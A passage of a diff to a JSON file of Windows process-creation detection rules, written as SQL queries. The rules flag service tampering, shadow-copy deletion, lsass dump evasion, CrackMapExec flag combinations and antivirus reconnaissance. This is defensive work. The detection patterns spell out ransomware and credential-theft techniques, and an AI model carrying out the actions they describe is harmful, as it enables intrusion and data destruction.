], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine 
LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", - "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "status": "test", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": 
"b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1489" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR 
CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR 
CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' 
ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE 
'%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE 
'\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - 
"False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE 
'% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + }, + { + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) 
AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", 
"tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. 
